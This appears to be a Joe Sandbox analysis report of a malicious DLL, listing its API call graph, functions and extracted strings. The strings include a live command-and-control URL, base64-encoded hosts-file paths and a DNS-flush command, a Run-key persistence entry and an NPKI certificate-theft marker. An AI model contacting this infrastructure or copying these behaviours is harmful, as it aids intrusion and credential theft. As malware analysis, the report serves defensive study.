                                                                                                                                            execution_graph 17067 10007101 17072 10007118 17067->17072 17071 100071a6 Sleep 17071->17072 17072->17071 17073 100071f7 wsprintfA 17072->17073 17076 10005c4c 17072->17076 17091 10003ef4 17072->17091 17094 100061bd 17072->17094 17113 1000570f 17073->17113 17077 10003ef4 wvsprintfA 17076->17077 17078 10005c86 17077->17078 17124 10003f72 PathFileExistsA 17078->17124 17080 10005c92 17081 10005c99 17080->17081 17082 10005c9d 17080->17082 17081->17072 17125 10004015 CreateFileA 17082->17125 17084 10005cbb 17084->17081 17126 10004035 ReadFile 17084->17126 17086 10005cd6 17127 10003f92 CloseHandle 17086->17127 17088 10005cdc 17128 10003f7d StrStrIA 17088->17128 17090 10005ce9 17090->17081 17129 10003ee1 wvsprintfA 17091->17129 17093 10003f06 17093->17072 17095 100061dd 17094->17095 17130 10003f0a InternetOpenA 17095->17130 17097 100061e4 17107 100061ee 17097->17107 17131 10003f24 InternetOpenUrlA 17097->17131 17099 10006206 17100 10006210 17099->17100 17101 10006219 17099->17101 17132 10003f58 InternetCloseHandle 17100->17132 17103 10006276 17101->17103 17109 1000621f 17101->17109 17135 10003f58 InternetCloseHandle 17103->17135 17105 10006216 17136 10003f58 InternetCloseHandle 17105->17136 17107->17072 17110 1000626c 17109->17110 17133 10003f41 InternetReadFile 17109->17133 17134 10003f92 CloseHandle 17110->17134 17112 10006274 17112->17103 17114 1000571c 17113->17114 17115 10005724 wsprintfA 17114->17115 17137 10005318 17115->17137 17117 10005776 wsprintfA wsprintfA 17139 10035e22 17117->17139 17124->17080 17125->17084 17126->17086 17127->17088 17128->17090 17129->17093 17130->17097 17131->17099 17132->17105 17133->17109 17134->17112 17135->17105 17136->17107 17138 10005325 17137->17138 17138->17117 17140 1003bf35 17139->17140 17154 10004482 17155 1000448d 17154->17155 17158 100040ba RegOpenKeyExA 17155->17158 17157 100044a4 17158->17157 17159 10006dc4 17161 10006dce 17159->17161 17160 10006ec4 17161->17160 17162 10003ef4 wvsprintfA 17161->17162 17163 10006e8f 17162->17163 17164 10003ef4 wvsprintfA 17163->17164 17165 10006eb8 17164->17165 17167 10006290 17165->17167 17168 100062a2 17167->17168 17177 10003f0a InternetOpenA 17168->17177 17170 100062a9 17176 100062da 17170->17176 17178 10003f24 InternetOpenUrlA 17170->17178 17172 100062c4 17179 10003f58 InternetCloseHandle 17172->17179 17174 100062d4 17180 10003f58 InternetCloseHandle 17174->17180 17176->17160 17177->17170 17178->17172 17179->17174 17180->17176 17181 10005846 17182 1000584d 17181->17182 17183 10005862 17182->17183 17185 10003eb4 gethostbyname 17182->17185 17185->17183 17186 10008567 Sleep 17187 1000858a 17186->17187 17188 100061bd 5 API calls 17187->17188 17189 100085b1 17188->17189 17190 100085ba Sleep 17189->17190 17191 100085c3 17189->17191 17190->17189 17192 1000826c 17193 100082a6 17192->17193 17194 10005c4c 6 API calls 17193->17194 17195 10003ef4 wvsprintfA 17193->17195 17196 100061bd 5 API calls 17193->17196 17197 1000838e Sleep 17193->17197 17199 100083df wsprintfA 17193->17199 17200 1000720e 17193->17200 17194->17193 17195->17193 17196->17193 17197->17193 17199->17193 17201 10007218 17200->17201 17203 1000726f 17201->17203 17205 1000756c 17201->17205 17229 10007a62 17201->17229 17203->17205 17233 1000504d 17203->17233 17205->17193 17206 100072b4 17207 10007404 17206->17207 17237 10007ccb 17206->17237 17207->17205 17210 10007ccb MultiByteToWideChar 17207->17210 17209 100072fb 17209->17207 17212 1000504d MultiByteToWideChar 17209->17212 17211 100074a5 17210->17211 17211->17205 17214 1000504d MultiByteToWideChar 17211->17214 17213 1000731d SafeArrayCreate VariantInit SafeArrayCreate VariantInit 17212->17213 17218 1000504d MultiByteToWideChar 17213->17218 17215 100074ca 17214->17215 17216 1000504d MultiByteToWideChar 17215->17216 17219 100074d9 SafeArrayCreate 17216->17219 17221 10007392 17218->17221 17222 10007519 17219->17222 17224 1000504d MultiByteToWideChar 17221->17224 17223 1000504d MultiByteToWideChar 17222->17223 17225 1000752f 17223->17225 17226 100073cb 17224->17226 17227 1000504d MultiByteToWideChar 17225->17227 17228 1000504d MultiByteToWideChar 17226->17228 17227->17205 17228->17207 17230 10007a6c 17229->17230 17231 1000504d MultiByteToWideChar 17230->17231 17232 10007ab6 17230->17232 17231->17232 17232->17203 17234 10005057 17233->17234 17236 10005078 17234->17236 17241 100050f5 17234->17241 17236->17206 17238 10007cd5 17237->17238 17239 1000504d MultiByteToWideChar 17238->17239 17240 10007ce9 17238->17240 17239->17240 17240->17209 17244 1000d0ae 17241->17244 17243 1000510c 17243->17236 17245 1000d0bd 17244->17245 17247 1000d0b9 17244->17247 17246 1000d0d6 MultiByteToWideChar 17245->17246 17246->17247 17247->17243 17248 100044ad 17250 10004489 17248->17250 17249 100044d9 GetExtendedUdpTable 17249->17250 17250->17248 17250->17249 17251 100044fe 17250->17251 17253 10004456 17250->17253 17252 10004509 GetExtendedUdpTable 17251->17252 17251->17253 17252->17253 17254 10004351 17256 1000436c 17254->17256 17255 10004370 17256->17255 17257 10004399 Sleep 17256->17257 17258 100043b3 17257->17258 17259 100043e0 Sleep 17258->17259 17260 100043ef 17259->17260 17260->17255 17261 100087b6 17262 100087bb CreateThread Sleep CreateThread Sleep 17261->17262 17263 100087eb 17262->17263 17264 1000841c 17262->17264 17269 10006a6e 17262->17269 17268 10008429 17264->17268 17265 100085ba Sleep 17266 1000855a Sleep 17266->17268 17268->17265 17268->17266 17270 10006a82 17269->17270 17279 10003ece CreateMutexA 17270->17279 17272 10006aa3 GetLastError 17273 10006b0b 17272->17273 17274 10006ab4 17272->17274 17276 10006ae1 CreateThread 17274->17276 17277 10006ad8 Sleep 17274->17277 17280 10006499 17274->17280 17278 10006b02 17276->17278 17299 1000687e 17276->17299 17277->17274 17278->17277 17279->17272 17281 100064a3 17280->17281 17282 100064e9 wsprintfA 17281->17282 17283 10006508 17282->17283 17296 10003f0a InternetOpenA 17283->17296 17285 1000652b 17286 100066d0 17285->17286 17297 10003f24 InternetOpenUrlA 17285->17297 17286->17274 17288 1000654b 17288->17286 17294 10006559 ctype 17288->17294 17290 100065bf MultiByteToWideChar 17290->17294 17291 100065d7 MultiByteToWideChar 17291->17294 17292 100066df wsprintfA 17295 100066b0 ctype 17292->17295 17293 10006647 17293->17292 17293->17295 17294->17290 17294->17291 17294->17293 17298 10003f41 InternetReadFile 17294->17298 17295->17286 17296->17285 17297->17288 17298->17294 17300 100068aa 17299->17300 17307 10005db4 17300->17307 17302 100068ec 17303 10005f15 8 API calls 17304 100068c0 17303->17304 17304->17302 17304->17303 17319 10005f98 17304->17319 17328 10003f63 ExitWindowsEx 17304->17328 17308 10005de5 17307->17308 17312 10005e1e 17308->17312 17329 1000409d RegQueryValueExA 17308->17329 17310 10005e16 17330 10004092 RegCloseKey 17310->17330 17313 10003ef4 wvsprintfA 17312->17313 17314 10005e89 17313->17314 17331 10005cf7 17314->17331 17317 10003ef4 wvsprintfA 17318 10005ee1 17317->17318 17318->17304 17320 10005fb9 17319->17320 17321 10003ef4 wvsprintfA 17319->17321 17354 10004015 CreateFileA 17320->17354 17321->17320 17323 10005fe3 17323->17304 17324 10005fd9 17324->17323 17355 10003f9d WriteFile 17324->17355 17326 10005fff 17356 10003f92 CloseHandle 17326->17356 17328->17304 17329->17310 17330->17312 17332 10003ef4 wvsprintfA 17331->17332 17333 10005d31 17332->17333 17348 10003f72 PathFileExistsA 17333->17348 17335 10005d3d 17336 10005d44 17335->17336 17337 10005d48 17335->17337 17336->17317 17336->17318 17349 10004015 CreateFileA 17337->17349 17339 10005d66 17339->17336 17350 10004035 ReadFile 17339->17350 17341 10005d81 17351 10003f92 CloseHandle 17341->17351 17343 10005d87 17352 10003f7d StrStrIA 17343->17352 17345 10005d94 17345->17336 17353 10003f7d StrStrIA 17345->17353 17347 10005da8 17347->17336 17348->17335 17349->17339 17350->17341 17351->17343 17352->17345 17353->17347 17354->17324 17355->17326 17356->17323 17357 10006ed6 17360 10006cf7 17357->17360 17370 10003ff7 GetShortPathNameA 17360->17370 17362 10006d32 17371 1000406c RegCreateKeyExA 17362->17371 17364 10006d60 wsprintfA 17365 10006d9a 17364->17365 17372 100040d4 RegSetValueExA 17365->17372 17367 10006db3 17373 10004092 RegCloseKey 17367->17373 17369 10006dbe 17370->17362 17371->17364 17372->17367 17373->17369 17374 100081f7 17377 10008200 17374->17377 17375 10007f3e 8 API calls 17375->17377 17377->17375 17378 1000825f Sleep 17377->17378 17379 1000400a GetDriveTypeA 17377->17379 17378->17377 17379->17377 17380 10006ede 17382 10006eeb 17380->17382 17381 1000591c lstrcmpiA CloseHandle CreateToolhelp32Snapshot Process32First Process32Next 17381->17382 17382->17381 17383 10006f1f Sleep 17382->17383 17389 10006f2c 17382->17389 17383->17382 17384 10005c4c 6 API calls 17384->17389 17385 10003ef4 wvsprintfA 17385->17389 17386 100061bd 5 API calls 17386->17389 17387 10007053 Sleep 17387->17389 17388 10007092 wsprintfA 17388->17389 17389->17384 17389->17385 17389->17386 17389->17387 17389->17388 17390 100070c8 PrintFile PrintFile 17389->17390 17390->17389 17391 10006b1f 17392 10006b3c 17391->17392 17399 10003ece CreateMutexA 17392->17399 17394 10006b50 GetLastError 17395 10006b61 CreateThread 17394->17395 17398 10006b90 17394->17398 17396 10006b7b 17395->17396 17400 1000687e 14 API calls 17395->17400 17397 10006b83 Sleep 17396->17397 17397->17395 17399->17394

                                                                                                                                            Executed Functions

                                                                                                                                            Function 10007F3E Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 230COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: %s\%s$*.*$.$107.160.131.254:23588/article.php$12010043$L2ltYWdlLnBocA==$NPKI$P
                                                                                                                                            • API String ID: 0-3984435826
                                                                                                                                            • Opcode ID: 0a215aef5ca7b5c606a273fdfbec72fd9b9d822c18bbfb0613fe871d940a9004
                                                                                                                                            • Instruction ID: 154fd83921e69bd95517e48f0429fd4d3315e101fc3602ca34ca7394d0d5f03d
                                                                                                                                            • Opcode Fuzzy Hash: 0a215aef5ca7b5c606a273fdfbec72fd9b9d822c18bbfb0613fe871d940a9004
                                                                                                                                            • Instruction Fuzzy Hash: C371517690425DBEEB61D7A4DC45FEEB7BCEB48240F1004E6F608E6041DB74AB898F61
                                                                                                                                            Function 10003FB7 Relevance: 1.5, APIs: 1, Instructions: 4processCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000000,00000000,10005931,00000002,00000000,00000000,00000000), ref: 10003FBF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateSnapshotToolhelp32
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3332741929-0
                                                                                                                                            • Opcode ID: 1e956e5b503a472c93e19a4642fd5130f6607d7bc175f230498bf039bbf47dc4
                                                                                                                                            • Instruction ID: ca46abfd3f4ae67059df7024880e3d5c8c44562ed1dec37196b9e10746ab925e
                                                                                                                                            • Opcode Fuzzy Hash: 1e956e5b503a472c93e19a4642fd5130f6607d7bc175f230498bf039bbf47dc4
                                                                                                                                            • Instruction Fuzzy Hash: D5A00136408212ABDA42AB50CD48D4AFFA2BBA8781F02C819F19980034CB32C5A5EB12
                                                                                                                                            Function 10006EDE Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 174sleepfileCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(0000EA60), ref: 10006F24
                                                                                                                                            • Sleep.KERNEL32 ref: 10007059
                                                                                                                                            • wsprintfA.USER32 ref: 1000709D
                                                                                                                                            • PrintFile.QCTYOYX422(00000000,?,00000000), ref: 100070D6
                                                                                                                                            • PrintFile.QCTYOYX422(00000000,?,00000000,?,00000000), ref: 100070E9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FilePrintSleep$wsprintf
                                                                                                                                            • String ID: QVNEU3ZjLmV4ZQ==$QVlSVFNydi5heWU=$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.160.131.254:23588/article.php$iOffset
                                                                                                                                            • API String ID: 1547040302-3813294871
                                                                                                                                            • Opcode ID: 6901e9babde4ee68b3136e4664651ea7350d119c703396e769bb1a0f608c4114
                                                                                                                                            • Instruction ID: e128ca64511400ca05deee7795c3814a468ccd3a13c6d035e862ae5cb279fd62
                                                                                                                                            • Opcode Fuzzy Hash: 6901e9babde4ee68b3136e4664651ea7350d119c703396e769bb1a0f608c4114
                                                                                                                                            • Instruction Fuzzy Hash: AC51D9B6D04359E6FB22D764CC56FCF77ACEB083C1F1045A5F208EA086DA75AB808E55
                                                                                                                                            Function 10006499 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 272timeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • wsprintfA.USER32 ref: 100064F7
                                                                                                                                              • Part of subcall function 10003F0A: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 10003F1C
                                                                                                                                            • ___crtGetTimeFormatEx.LIBCMT ref: 10006546
                                                                                                                                              • Part of subcall function 10003F24: InternetOpenUrlA.WININET(80000100,00000000,00000000,00000000,00000000,10006206), ref: 10003F39
                                                                                                                                              • Part of subcall function 10003F41: InternetReadFile.WININET(?,?,?,?), ref: 10003F51
                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,75920ECC,0007D000,00000000,00000000), ref: 100065C8
                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,?,?,?,75920ECC,0007D000,00000000,00000000), ref: 100065E6
                                                                                                                                            • wsprintfA.USER32 ref: 100066E9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$ByteCharMultiOpenWidewsprintf$FileFormatReadTime___crt
                                                                                                                                            • String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$aHR0cDovL2Jsb2cuc2luYS5jb20uY24vdS8lcw==$title
                                                                                                                                            • API String ID: 4077377486-2496724313
                                                                                                                                            • Opcode ID: c3904df0163014b294ad3428c8b46474ddc640335be8714e90fc727204d8a3f7
                                                                                                                                            • Instruction ID: 9bb45785208bde0406de56643d62444fa716b577ceefe44749a59ab2aa42cbd8
                                                                                                                                            • Opcode Fuzzy Hash: c3904df0163014b294ad3428c8b46474ddc640335be8714e90fc727204d8a3f7
                                                                                                                                            • Instruction Fuzzy Hash: 9C81E5B5C05248BEFB01DBA4DC82EEF7B7EEF09394F244059F504A7186DA356E4187A1
                                                                                                                                            Function 10005DB4 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 116timeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • ___crtGetTimeFormatEx.LIBCMT ref: 10005E11
                                                                                                                                              • Part of subcall function 1000409D: RegQueryValueExA.KERNEL32(00000000,?,000F003F,00000000,?,80000002,?,10005E16,?,ProcessorNameString,00000000,00000004,?,?,80000002,?), ref: 100040B2
                                                                                                                                              • Part of subcall function 10004092: RegCloseKey.KERNEL32(?,10006DBE,?), ref: 10004096
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseFormatQueryTimeValue___crt
                                                                                                                                            • String ID: %u MB$12010043$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.160.131.254:23588/article.php
                                                                                                                                            • API String ID: 271660946-3893357082
                                                                                                                                            • Opcode ID: 37022121a03464651817a9c0c5e1d81c5aa94c867a3c5e15367f04ef0a505e5e
                                                                                                                                            • Instruction ID: 4f35d1d9e5d3edf0c8f7125bb17b53cb037807f44d0344e2d1e4939474d77481
                                                                                                                                            • Opcode Fuzzy Hash: 37022121a03464651817a9c0c5e1d81c5aa94c867a3c5e15367f04ef0a505e5e
                                                                                                                                            • Instruction Fuzzy Hash: 6531C0B6804208BAFB10C764DC42FDF77BCEB08351F10406AFA18BA082EB75BA458B55
                                                                                                                                            Function 10006CF7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 72timeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 10003FF7: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
                                                                                                                                              • Part of subcall function 1000406C: RegCreateKeyExA.KERNEL32(?,00000000,000F003F,00000000,?,00000000,00000000,80000001,10006D60,?,10006D60,80000001,00000000,00000000,REG_SZ,00000000), ref: 1000408A
                                                                                                                                            • wsprintfA.USER32 ref: 10006D88
                                                                                                                                            • ___crtGetTimeFormatEx.LIBCMT ref: 10006DAE
                                                                                                                                              • Part of subcall function 100040D4: RegSetValueExA.KERNEL32(00000001,?,00000001,00000000,?,?,?,10006DB3,?,dtfd,00000000,00000001,?,00000001,?), ref: 100040E9
                                                                                                                                              • Part of subcall function 10004092: RegCloseKey.KERNEL32(?,10006DBE,?), ref: 10004096
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateFormatNamePathShortTimeValue___crtwsprintf
                                                                                                                                            • String ID: %s "%s",DoAddToFavDlg$C:\Users\user\Desktop\QCTYoyX422.dll$C:\Windows\SysWOW64\rundll32.exe$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==$dtfd
                                                                                                                                            • API String ID: 1762869224-3033863913
                                                                                                                                            • Opcode ID: fe4a6ca71fda934b348afe6d657169d78400bf351d74a23e551a426737a6504a
                                                                                                                                            • Instruction ID: 20d4b35ab7fa00c236079ec8a4dd8982143edab80ee48f6a2419757257224b01
                                                                                                                                            • Opcode Fuzzy Hash: fe4a6ca71fda934b348afe6d657169d78400bf351d74a23e551a426737a6504a
                                                                                                                                            • Instruction Fuzzy Hash: 451160B694415CBEFB11D7A4DC86FEA776CEB14340F1404A1F704FA085DAB16F988AA4
                                                                                                                                            Function 1000826C Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 145sleepCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00080000,00000000,00000000), ref: 10008394
                                                                                                                                            • wsprintfA.USER32 ref: 100083E6
                                                                                                                                            Strings
                                                                                                                                            • 127.0.0.1, xrefs: 100083F4
                                                                                                                                            • http://107.160.131.254:23588/article.php, xrefs: 10008353
                                                                                                                                            • XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 100082DC
                                                                                                                                            • XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 100082C5
                                                                                                                                            • 8.8.8.8, xrefs: 100083EF
                                                                                                                                            • Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=, xrefs: 10008405
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleepwsprintf
                                                                                                                                            • String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=$http://107.160.131.254:23588/article.php
                                                                                                                                            • API String ID: 1749205058-626475063
                                                                                                                                            • Opcode ID: 54eedc971582e05c3486c3a0f88f100d4df9f5038933db9e4620657874ea0a6d
                                                                                                                                            • Instruction ID: 78e0688a60563a7bb1736696f6623559e09cac3deedd02f0104af55f58a5e4a8
                                                                                                                                            • Opcode Fuzzy Hash: 54eedc971582e05c3486c3a0f88f100d4df9f5038933db9e4620657874ea0a6d
                                                                                                                                            • Instruction Fuzzy Hash: 9E4106B6D04258B6F721D364CC46FCF77ACEB457C0F2400A6F248A9086EAB4AB848E51
                                                                                                                                            Function 10006A6E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58sleepthreadCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006B50,?,?,?,00000202,?), ref: 10003EDA
                                                                                                                                            • GetLastError.KERNEL32 ref: 10006AA8
                                                                                                                                              • Part of subcall function 10006499: wsprintfA.USER32 ref: 100064F7
                                                                                                                                              • Part of subcall function 10006499: ___crtGetTimeFormatEx.LIBCMT ref: 10006546
                                                                                                                                            • Sleep.KERNEL32(0002BF20,00000000,00000000,00000000,00000000,000000FF), ref: 10006ADD
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,1000687E,00000000,00000000,00000000), ref: 10006AF1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create$ErrorFormatLastMutexSleepThreadTime___crtwsprintf
                                                                                                                                            • String ID: 0x5d65r455f$5762479093
                                                                                                                                            • API String ID: 3244495550-2446933972
                                                                                                                                            • Opcode ID: 3b97f3ef57c6d34437c21e844b3cc3d0ae84d0d31088cb251ee543bf93b7c76e
                                                                                                                                            • Instruction ID: bd1adab126fe453b34de0ea9e0b5f284958d10fa0a203dc352c1be2a30225ce5
